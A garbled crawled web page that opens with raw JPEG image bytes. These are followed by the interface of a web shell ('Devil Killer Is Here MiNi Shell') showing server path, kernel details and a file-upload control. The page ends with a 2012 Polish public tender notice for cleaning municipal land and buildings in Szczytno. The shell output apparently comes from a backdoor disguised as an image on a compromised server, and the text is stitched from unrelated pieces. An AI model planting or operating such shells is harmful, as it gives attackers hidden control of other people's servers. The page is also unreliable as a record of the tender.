JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121114/449490-N-2012.html

<p class="kh_header"><b>Szczytno: Sprzątanie nieruchomości komunalnych i terenów miejskich przyległych do wspólnot mieszkaniowych na terenie miasta Szczytno, administrowanych przez Zakład Gospodarki Komunalnej w Szczytnie o łącznej powierzchni: tereny zielone -           36 289 m2, tereny utwardzone - 60 346 m2, powierzchnia wewnętrzna budynków - 2 534 m2, w okresie od 01.01.2013 r. do 30.06.2013 r.</b><br>
<b>Numer ogłoszenia: 449490 - 2012; data zamieszczenia: 14.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej , ul. Polska 38, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 89 6248511 w. 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgk.szczytno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie nieruchomości komunalnych i terenów miejskich przyległych do wspólnot mieszkaniowych na terenie miasta Szczytno, administrowanych przez Zakład Gospodarki Komunalnej w Szczytnie o łącznej powierzchni: tereny zielone -           36 289 m2, tereny utwardzone - 60 346 m2, powierzchnia wewnętrzna budynków - 2 534 m2, w okresie od 01.01.2013 r. do 30.06.2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.	Powierzchnie do sprzątania przyległe do Wspólnot Mieszkaniowych - załącznik nr 3 (tereny zielone - 14 534 m2, tereny utwardzone - 34 313 m2):
1.	W zakresie utrzymania terenów zewnętrznych: - codzienne sprzątanie chodników oraz utrzymanie porządku w miejscach posadowienia pojemników i kontenerów do gromadzenia odpadów; - trzy razy w tygodniu sprzątanie podwórek, trawników, bram, dojazdów do budynków, placów, parkingów i innych powierzchni objętych umową (załącznik nr 3, poz. 2, 6, 11, 15, 19, 20, 35, 40, 41, 42, 43, 44, 46, 47);-	raz w tygodniu sprzątanie podwórek, trawników, bram, dojazdów do budynków, placów, parkingów i innych powierzchni objętych umową (załącznik nr 3, poz. 3, 4, 5, 7, 8, 9, 10, 12, 13, 14, 16, 17, 18, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 36, 37, 38, 39, 45);  1.1. W zakresie utrzymania terenów zielonych: - stała opieka nad zielenią w obsługiwanym rejonie poprzez sprzątanie i pielęgnowanie trawników, - systematyczne koszenie trawników w ciągu sezonu (trawa nie może być wyższa niż 20 cm), grabienie i wywóz pokosu, -bieżące usuwanie traw i chwastów z chodników i opasek wokół budynków, - grabienie i wywóz liści w okresie jesiennym (w miarę potrzeb) wraz z ich wywozem przed okresem zimowym, - przycinanie gałęzi, krzewów i drobnej zieleni (w miarę potrzeb) wraz z ich wywozem, - pielęgnacja żywopłotu (strzyżenie i oczyszczanie z zanieczyszczeń), (załącznik 3 poz., 5, 17, 19, 20, 34, 36, 45, 46) -	wywóz gałęzi oraz nieczystości powstałych po wykonaniu prac porządkowych, - w okresie zimowym, kiedy na większości terenów zielonych zalegał będzie śnieg, należy sprzątać codziennie zalegające na śniegu odpady komunalne oraz odśnieżać dojścia do pomieszczeń gospodarczych, śmietników i przejść dla pieszych, przycinanie gałęzi drzew i krzewów - w miarę występujących potrzeb. 1.2. W zakresie utrzymania terenów utwardzonych: - porządkowanie terenów utwardzonych, w szczególności placów, parkingów, miejsc postojowych, chodników i dróg wewnętrznych z zalegających odpadów komunalnych, - grabienie i wywóz liści w okresie jesiennym. 2. W zakresie sprzątania w okresie zimowym: -bieżące odśnieżanie w szczególności: chodników, dojść do klatek schodowych, dojść i dojazdów do śmietników, dróg osiedlowych, parkingów, miejsc postojowych, dojść do pomieszczeń gospodarczych, dojść do przejść dla pieszych, oraz usuwanie błota pośniegowego, - usuwanie gołoledzi w szczególności z chodników i dojść do budynków wraz z usunięciem oblodzeń i posypywanie piaskiem również w dni wolne od pracy, - stałe utrzymanie drożności odpływu z chodników wody z topniejącego śniegu i lodu, - oczyszczanie urządzeń burzowych (kratek) oraz pokryw na studzienkach    telekomunikacyjnych usytuowanych w ciągach pieszych, -uprzątnięcie i wywiezienie po okresie zimowym piasku użytego do usuwania gołoledzi, - zabezpieczenie i uzupełnienie piasku na okres zimowy, -	pielęgnacja terenów zielonych poprzez codzienne sprzątanie zalegających odpadów komunalnych, przycinanie gałęzi drzew i krzewów, - inne w miarę występujących potrzeb w związku z występującymi warunkami atmosferycznymi. B. Powierzchnie do sprzątania - budynki komunalne mieszkalne - załącznik nr 4 (tereny zielone - 18 475 m2, tereny utwardzone - 23 970 m2, powierzchnie wewnętrzne - 2 143 m2):
1. W zakresie utrzymania terenów zewnętrznych: - codzienne sprzątanie chodników oraz utrzymanie porządku w miejscach posadowienia pojemników i kontenerów do gromadzenia odpadów - trzy razy w tygodniu sprzątanie podwórek, trawników, bram, dojazdów do budynków, placów, parkingów i innych powierzchni objętych umową (załącznik nr 4, poz. 2, 4, 5, 6, 13, 15, 16, 25, 26, 27, 28, 29, 41, 42, 48, 51, 52, 53, 57) - raz w tygodniu sprzątanie podwórek, trawników, bram, dojazdów do budynków, placów, parkingów i innych powierzchni objętych umową (załącznik nr 4, poz. 1, 3, 7, 8, 9, 10, 11, 12, 17, 18, 19, 20, 21, 22, 23, 24, 30, 31, 32, 33, 34, 36, 37, 38, 39, 40, 47, 49, 54, 55, 56) 1.1. W zakresie utrzymania terenów zielonych: - stała opieka nad zielenią w obsługiwanym rejonie poprzez sprzątanie i pielęgnowanie trawników, - systematyczne koszenie trawników w ciągu sezonu (trawa nie może być wyższa niż 20 cm), grabienie i wywóz pokosu, -bieżące usuwanie traw i chwastów z chodników i opasek wokół budynków, - grabienie i wywóz liści w okresie jesiennym (w miarę potrzeb) wraz z ich wywozem przed okresem zimowym, - przycinanie gałęzi, krzewów i drobnej zieleni (w miarę potrzeb) wraz z ich wywozem, - pielęgnacja żywopłotu (strzyżenie i oczyszczanie z zanieczyszczeń), -	wywóz gałęzi oraz nieczystości powstałych po wykonaniu prac porządkowych, - w okresie zimowym, kiedy na większości terenów zielonych zalegał będzie śnieg, należy sprzątać codziennie zalegające na śniegu odpady komunalne oraz odśnieżać dojścia do pomieszczeń gospodarczych, śmietników i przejść dla pieszych, przycinanie gałęzi drzew i krzewów - w miarę występujących potrzeb. 1.2. W zakresie utrzymania terenów utwardzonych: - porządkowanie terenów utwardzonych, w szczególności placów, parkingów, miejsc postojowych, chodników i dróg wewnętrznych z zalegających odpadów komunalnych, - grabienie i wywóz liści w okresie jesiennym. 2.	W zakresie sprzątania w okresie zimowym: - bieżące odśnieżanie w szczególności: chodników, dojść do klatek schodowych, dojść i dojazdów do śmietników, dróg osiedlowych, parkingów, miejsc postojowych, dojść do pomieszczeń gospodarczych, dojść do przejść dla pieszych, oraz usuwanie błota pośniegowego, - usuwanie gołoledzi w szczególności z chodników i dojść do budynków wraz z usunięciem oblodzeń i posypywanie piaskiem również w dni wolne od pracy, - stałe utrzymanie drożności odpływu z chodników wody z topniejącego śniegu i   lodu, - oczyszczanie urządzeń burzowych (kratek) oraz pokryw na studzienkach    telekomunikacyjnych usytuowanych w ciągach pieszych, - uprzątnięcie i wywiezienie po okresie zimowym piasku użytego do usuwania gołoledzi, - zabezpieczenie i uzupełnienie piasku na okres zimowy, - pielęgnacja terenów zielonych poprzez codzienne sprzątanie zalegających odpadów komunalnych, przycinanie gałęzi drzew i krzewów, - inne w miarę występujących potrzeb w związku z występującymi warunkami atmosferycznymi. 3. W zakresie utrzymania porządku i czystości powierzchni wewnętrznych: - trzy razy w tygodniu sprzątanie całych klatek schodowych, w szczególności: wiatrołapów, korytarzy, podestów, stopni schodowych  z  balustradami i pochwytami (załącznik nr 4, poz. 27, 28, 29, 32, 39, 51, 52, 53) - raz w tygodniu sprzątanie całych klatek schodowych, w szczególności: wiatrołapów, korytarzy, podestów, stopni schodowych  z  balustradami i pochwytami (załącznik nr 4, poz. 1, 4, 6, 15, 20, 25, 26, 42, 47) - raz na 2 tygodnie mycie klatek schodowych budynków (w szczególności: sieni, korytarzy, podestów, stopni, podstopni, balustrad schodowych), - raz w miesiącu sprzątanie i mycie powierzchni i pomieszczeń ogólnodostępnych,  w tym: pralni, suszarni, korytarzy piwnicznych, wózkowni i innych pomieszczeń ogólnodostępnych objętych umową - w miarę potrzeby częściej, - raz w miesiącu mycie drzwi wejściowych do budynku i w innych pomieszczeniach   ogólnodostępnych oraz ścian z glazury i malowanych olejno - w miarę potrzeby częściej, - 2 razy w roku mycie okien na klatkach schodowych i w pomieszczeniach    ogólnodostępnych,  -   bieżące utrzymanie czystości szafek ogłoszeniowych. Zaopatrzenie w wodę do mycia klatek schodowych w nieruchomościach zabezpiecza Wykonawca. C.	Powierzchnie do sprzątania - budynki komunalne użytkowe - załącznik nr 5 (tereny utwardzone - 1 277 m2, tereny zielone - 957 m2): 1.	W zakresie utrzymania terenów zewnętrznych: - codzienne sprzątanie chodników, podwórek, trawników, dojazdów do budynków, placów, parkingów i innych powierzchni objętych umową oraz utrzymanie porządku w miejscach posadowienia pojemników i kontenerów do gromadzenia odpadów, 1.1. W zakresie utrzymania terenów zielonych: - stała opieka nad zielenią w obsługiwanym rejonie poprzez sprzątanie i pielęgnowanie trawników, - systematyczne koszenie trawników w ciągu sezonu (trawa nie może być wyższa niż 20 cm), grabienie i wywóz pokosu, - bieżące usuwanie traw i chwastów z chodników i opasek wokół budynków, - grabienie i wywóz liści w okresie jesiennym (w miarę potrzeb) wraz z ich wywozem przed okresem zimowym, -	przycinanie gałęzi, krzewów i drobnej zieleni (w miarę potrzeb) wraz z ich wywozem, - pielęgnacja żywopłotu (strzyżenie i oczyszczanie z zanieczyszczeń), - wywóz gałęzi oraz nieczystości powstałych po wykonaniu prac porządkowych, - w okresie zimowym, kiedy na większości terenów zielonych zalegał będzie śnieg, należy sprzątać codziennie zalegające na śniegu odpady komunalne oraz odśnieżać dojścia do pomieszczeń gospodarczych, śmietników i przejść dla pieszych, przycinanie gałęzi drzew i krzewów - w miarę występujących potrzeb. 1.2. W zakresie utrzymania terenów utwardzonych: -	codzienne porządkowanie terenów utwardzonych, w szczególności placów, parkingów, miejsc postojowych, chodników z zalegających odpadów komunalnych, - grabienie i wywóz liści w okresie jesiennym. 2. W zakresie sprzątania w okresie zimowym: - bieżące odśnieżanie w szczególności: chodników, dojść do klatek schodowych, dojść i dojazdów do śmietników, parkingów, miejsc postojowych, dojść do przejść dla pieszych, oraz usuwanie błota pośniegowego, - usuwanie gołoledzi w szczególności z chodników i dojść do budynków wraz z usunięciem oblodzeń i posypywanie piaskiem również w dni wolne od pracy, - stałe utrzymanie drożności odpływu z chodników wody z topniejącego śniegu i   lodu, - oczyszczanie urządzeń burzowych (kratek) oraz pokryw na studzienkach    telekomunikacyjnych usytuowanych w ciągach pieszych,
- uprzątnięcie i wywiezienie po okresie zimowym piasku użytego do usuwania gołoledzi, - zabezpieczenie i uzupełnienie piasku na okres zimowy, -	pielęgnacja terenów zielonych poprzez codzienne sprzątanie zalegających odpadów komunalnych, przycinanie gałęzi drzew i krzewów, - inne w miarę występujących potrzeb w związku z występującymi warunkami atmosferycznymi. D. Powierzchnie do sprzątania - budynek komunalny użytkowy przy ul. Kościuszki 20 - załącznik nr 6 (tereny zielone - 2 323 m2, tereny utwardzone - 786 m2, powierzchnie wewnętrzne - 391 m2): 1.	W zakresie utrzymania terenów zewnętrznych: - codzienne sprzątanie chodników, podwórek, trawników, bram, dojazdów do budynków, placów, parkingów i innych powierzchni objętych umową oraz utrzymanie porządku w miejscach posadowienia pojemników i kontenerów do gromadzenia odpadów,) 1.1.	 W zakresie utrzymania terenów zielonych: - stała opieka nad zielenią w obsługiwanym rejonie poprzez sprzątanie i pielęgnowanie trawników, - systematyczne koszenie trawników w ciągu sezonu (trawa nie może być wyższa niż 10 cm), grabienie i wywóz pokosu, - bieżące usuwanie traw i chwastów z chodników i opasek wokół budynków, - grabienie i wywóz liści w okresie jesiennym (w miarę potrzeb - jednak nie rzadziej niż raz na trzy dni) wraz z ich wywozem przed okresem zimowym, - przycinanie gałęzi, krzewów i drobnej zieleni (w miarę potrzeb) wraz z ich wywozem, - pielęgnacja żywopłotu (strzyżenie i oczyszczanie z zanieczyszczeń), - wywóz gałęzi oraz nieczystości powstałych po wykonaniu prac porządkowych, - codzienne usuwanie śmieci z koszy przed budynkami, - w okresie zimowym, kiedy na większości terenów zielonych zalegał będzie śnieg, należy sprzątać codziennie zalegające na śniegu odpady komunalne oraz odśnieżać dojścia do pomieszczeń gospodarczych, śmietników i przejść dla pieszych, przycinanie gałęzi drzew i krzewów. 1.2. W zakresie utrzymania terenów utwardzonych: - codzienne porządkowanie terenów utwardzonych, w szczególności placów, parkingów, miejsc postojowych, chodników i dróg wewnętrznych z zalegających odpadów komunalnych, - grabienie i wywóz liści w okresie jesiennym. 2. W zakresie sprzątania w okresie zimowym: -bieżące odśnieżanie w szczególności: chodników, dojść do klatek schodowych, dojść  i dojazdów do śmietników, dróg osiedlowych, parkingów, miejsc postojowych, dojść do pomieszczeń gospodarczych i dojazdów do garaży, dojść do przejść dla pieszych, oraz usuwanie błota pośniegowego, -	usuwanie gołoledzi w szczególności z chodników i dojść do budynków wraz z usunięciem oblodzeń i posypywanie piaskiem również w dni wolne od pracy, - stałe utrzymanie drożności odpływu z chodników wody z topniejącego śniegu i   lodu, - oczyszczanie urządzeń burzowych (kratek) oraz pokryw na studzienkach    telekomunikacyjnych usytuowanych w ciągach pieszych, -	uprzątnięcie i wywiezienie po okresie zimowym piasku użytego do usuwania gołoledzi, - zabezpieczenie i uzupełnienie piasku na okres zimowy, - pielęgnacja terenów zielonych poprzez codzienne sprzątanie zalegających odpadów komunalnych, przycinanie gałęzi drzew i krzewów, - inne w miarę występujących potrzeb w związku z występującymi warunkami atmosferycznymi. 3. W zakresie utrzymania porządku i czystości powierzchni wewnętrznych: - codzienne sprzątanie i mycie klatek schodowych w tym: wiatrołapów, korytarzy, podestów, stopni schodowych  z  balustradami i pochwytami oraz drzwi,  - codzienne sprzątanie i mycie toalet, - raz w miesiącu mycie ścian i lamp oświetleniowych - w miarę potrzeby częściej, -	4 razy w ciągu roku mycie  okien i witryn - w miarę potrzeby częściej, Utrzymanie czystości i porządku wewnątrz obiektu powinno się odbywać zgodnie z wymogami obowiązującymi w obiektach służby zdrowia. E.	W zakresie utrzymania stanu sanitarnego:  - zgłaszanie do służb ZGK przypadków: a) zanieczyszczania przez zwierzęta domowe klatek schodowych i miejsc ogólnodostępnych, wypuszczania psów luzem, wykładania żywności na klatkach schodowych, b) zgłaszanie potrzeb w zakresie dezynfekcji, dezynsekcji i deratyzacji oraz ich wykonywanie, c) konieczności wywozu starych mebli, urządzeń wystawianych przez lokatorów przy śmietnikach (kontenerach) i na terenie posesji. F. Inne: -	 bezzwłoczne zawiadomienie Zamawiającego: o dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji (elektrycznej, gazowej, wodno - kanalizacyjnej, c.o.) oraz innych urządzeń technicznych przeznaczonych  do wspólnego użytku mieszkańców, o dostrzeżonych wszelkiego rodzaju przypadkach dewastacji, zniszczeń lub kradzieży wyposażenia budynku, o konieczności naprawy lub wymiany tablic ogłoszeniowych znajdujących się w budynku oraz o przypadkach zaginięcia tablicy, o zagrożeniach pożarowych, o nie wykonaniu obowiązków przez jednostki zajmujące się wywozem nieczystości, o wszelkich przypadkach braku możliwości wykonania obowiązków wynikających z niniejszej umowy, - Wykonawca wywiesza na tablicach ogłoszeń informacje przekazywane przez Zamawiającego oraz dostarcza użytkownikom aneksy o zmianie naliczeń w opłatach za pokwitowaniem, rozliczenia kosztów z tytułu zużycia mediów oraz uczestniczy w odczytach wodomierzy.
Wykaz obiektów i terenów objętych zamówieniem stanowią załączniki nr 3, 4, 5, 6 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego stanowiącego nie więcej niż 50% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia. Zakres zamówienia uzupełniającego zostanie ustalona w oparciu o protokół sporządzony przez Zamawiającego zaś wartość zamówienia uzupełniającego ustalona zostanie na podstawie wielkości powierzchni zleconych dodatkowo do sprzątania oraz stawek z przetargu zawartych w ofercie.
Wykonanie zamówienia uzupełniającego wymaga zawarcia odrębnej umowy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 2500 zł - dla całego zamówienia należy wnieść przed upływem terminu składania ofert z dopiskiem: wadium na sprzątanie, w terminie do dnia 29.11.2012 r. do godz. 8:30 (za termin wniesienia wadium uważa się datę wpłynięcia środków na konto Zamawiającego)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone przez wykonawcę o spełnianiu warunków udziału w postępowaniu, w tym posiadaniu wiedzy i doświadczenia oraz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadający swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonywania i odbiorców, oraz dokumentów potwierdzających, że te usługi zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone przez wykonawcę o spełnianiu warunków udziału w postępowaniu, w tym dysponowaniu odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone przez wykonawcę o spełnianiu warunków udziału w postępowaniu, w tym dysponowaniu osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone przez wykonawcę o spełnianiu warunków udziału w postępowaniu, w tym sytuacji ekonomicznej i finansowej oraz informacja z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

